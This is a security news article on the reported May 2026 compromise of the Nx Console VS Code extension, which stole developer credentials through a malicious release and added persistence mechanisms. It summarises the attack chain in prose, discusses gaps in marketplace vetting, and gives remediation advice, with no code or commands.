Nx Console VS Code Extension Compromised in Supply Chain Attack Targeting Developer Credentials
Malicious v18.95.0 harvested cloud secrets and SSH keys from enterprise development environments during 11-minute window on Microsoft Marketplace.
A sophisticated supply chain attack on 18 May 2026 weaponized the Nx Console VS Code extension to harvest developer credentials, cloud secrets, and SSH keys from compromised workstations, exposing critical gaps in marketplace verification systems.
The malicious v18.95.0 release remained live on Microsoft’s official VS Code Marketplace for 11 minutes starting at 12:36 UTC, targeting an extension with 2.2 million installations across enterprise development teams. Attackers injected 2.7 KB of malicious code into the minified main.js file using stolen publisher credentials, according to StepSecurity. The payload fetched a 498 KB obfuscated stealer from an orphan commit hidden in the official nrwl/nx GitHub repository, designed to exfiltrate GitHub tokens, npm credentials, AWS secrets, HashiCorp Vault keys, Kubernetes configurations, and 1Password data via HTTPS, GitHub API, and DNS tunneling.
Attack Chain Exploited GitHub Token Theft
The compromise originated from a stolen GitHub contributor token scraped during an unrelated security incident. Attackers used this access to plant the payload as an orphan commit at 03:18 UTC—nine hours before publishing the malicious extension—avoiding detection in standard commit history reviews, per GBHackers. The attackers then leveraged stolen VSCE_PAT publishing credentials to push v18.95.0 directly to the marketplace without triggering Microsoft’s limited automated vetting.
The payload incorporated Sigstore attestation logic typically used for cryptographic package verification. This allowed attackers to sign downstream npm packages with valid signatures that could pass standard verification checks in CI/CD pipelines, expanding the attack surface beyond individual developer workstations to automated deployment infrastructure, according to CyberSecurityNews.
“Anyone who installed v18.95.0 should treat their environment as fully compromised.”
— GBHackers Security Analysis
Persistent Backdoors Embedded in Compromised Systems
Beyond Credential Theft, the Malware established persistent access mechanisms. On Linux systems, attackers probed for passwordless sudo configurations and injected sudoers rules for root-level persistence. Compromised macOS workstations received LaunchAgent persistence artifacts, while all affected machines deployed Python-based command-and-control dead-drop polling mechanisms for ongoing remote access, according to StepSecurity.
The attack marks the second major supply chain compromise of the Nx ecosystem in under a year. A previous incident in August 2025 targeted Nx npm packages, suggesting attackers have systematically mapped weaknesses in the Nx publishing pipeline and contributor access controls.
Marketplace Verification Gaps Enable Repeat Attacks
The incident exposes systemic weaknesses in the VS Code Marketplace approval process. Microsoft operates no automated security scanning or permission-based sandboxing for marketplace submissions, according to SecurityBlue Team. Extensions receive broad filesystem and network access by default, with minimal oversight of code changes between versions. The marketplace has experienced repeated security incidents throughout 2025-2026, including the GlassWorm, MaliciousCorgi, and Bitcoin Black campaigns, yet fundamental verification architecture remains unchanged.
OpenVSX, an alternative extension marketplace, was not affected by the attack. The blast radius remained limited to VS Code Marketplace users who had auto-updates enabled during the 11-minute window, though the exact number of affected installations remains unknown.
The attack targeted credentials with cascading risk across infrastructure layers: GitHub tokens enable source code manipulation, AWS keys grant cloud resource access, npm credentials allow malicious package publishing, and Kubernetes configurations expose production cluster control planes. A single compromised developer workstation can become an entry point for downstream supply chain attacks affecting thousands of end users.
Pattern Fits Broader 2026 Supply Chain Campaign
The Nx Console compromise aligns with coordinated supply chain attacks across npm, PyPI, and Docker Hub throughout 2026, shifting focus from code poisoning to credential theft and CI/CD infrastructure compromise. Developer workstations now function as high-value supply chain nodes rather than endpoints, according to The Hacker News. Attackers increasingly target publishing credentials and signing keys to enable legitimate-looking downstream package distribution that bypasses signature verification.
Dark Reading reported that Microsoft plans to introduce secret scanning tools for marketplace submissions in June 2026, though these measures would not have prevented the Nx Console attack, which relied on pre-compromised credentials and legitimate signing infrastructure rather than embedded secrets in extension code.
What to Watch
Development teams should immediately audit workstations that had Nx Console installed on 18 May 2026 between 12:36-12:47 UTC. Affected environments require full credential rotation including GitHub tokens, cloud provider keys, npm access tokens, SSH keys, and Kubernetes configurations. Organisations should examine CI/CD pipeline logs for anomalous npm package publishing or infrastructure access originating from developer accounts during the exposure window.
The incident will likely accelerate pressure on Microsoft to implement permission-based sandboxing and mandatory code review for high-privilege extensions. Enterprise security teams should evaluate whether centralised extension approval workflows and locked-down marketplace access reduce exposure to compromised publisher accounts. The repeat targeting of Nx infrastructure suggests attackers maintain persistent access to portions of the publishing pipeline, making additional incidents probable without fundamental access control reforms.